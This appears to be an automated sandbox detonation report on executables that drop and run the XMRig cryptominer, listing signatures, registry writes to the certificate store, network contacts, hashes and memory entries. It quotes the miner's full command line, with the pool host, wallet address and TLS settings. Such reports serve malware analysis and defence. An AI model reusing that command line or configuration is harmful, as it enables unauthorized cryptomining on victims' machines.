4a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.115:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 115.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3372-14-0x0000014206CA0000-0x0000014206CC0000-memory.dmp

memory/3372-15-0x0000014206CF0000-0x0000014206D10000-memory.dmp

memory/3372-16-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-18-0x0000014206D30000-0x0000014206D50000-memory.dmp

memory/3372-17-0x0000014206D10000-0x0000014206D30000-memory.dmp

memory/3372-19-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-20-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-21-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-22-0x0000014206D10000-0x0000014206D30000-memory.dmp

memory/3372-23-0x0000014206D30000-0x0000014206D50000-memory.dmp

memory/3372-24-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-25-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-26-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-27-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-28-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-29-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-30-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-31-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-32-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-33-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-34-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-35-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-36-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-37-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-38-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-39-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-40-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-41-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-42-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-43-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-44-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-45-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-46-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-47-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-48-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-49-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-50-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-51-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-52-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-53-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-54-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-55-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-56-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-57-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-58-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-59-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-60-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-61-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-62-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-63-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-64-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-65-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-66-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-67-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-68-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-69-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-70-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-71-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-72-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-73-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-74-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-75-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-76-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-77-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-78-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-79-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-80-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-81-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-82-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:47

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
BE 88.221.83.184:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 184.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 47.23.48.23.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/412-14-0x000001E2761E0000-0x000001E276200000-memory.dmp

memory/412-15-0x000001E2779E0000-0x000001E277A00000-memory.dmp

memory/412-16-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-18-0x000001E277A20000-0x000001E277A40000-memory.dmp

memory/412-17-0x000001E277A00000-0x000001E277A20000-memory.dmp

memory/412-19-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-20-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-23-0x000001E277A20000-0x000001E277A40000-memory.dmp

memory/412-22-0x000001E277A00000-0x000001E277A20000-memory.dmp

memory/412-21-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-24-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-25-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-26-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-27-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-28-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-29-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-30-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-31-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-32-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-33-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-34-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-35-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-36-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-37-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-38-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-39-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-40-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-41-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-42-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-43-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-44-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-45-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-46-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-47-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-48-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-49-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-50-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-51-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-52-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-53-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-54-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-55-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-56-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-57-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-58-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-59-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-60-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-61-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-62-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-63-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-64-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-65-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-66-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-67-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-68-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-69-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-70-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-71-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-72-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-73-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-74-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-75-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-76-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-77-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-78-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-79-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-80-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-81-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-82-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
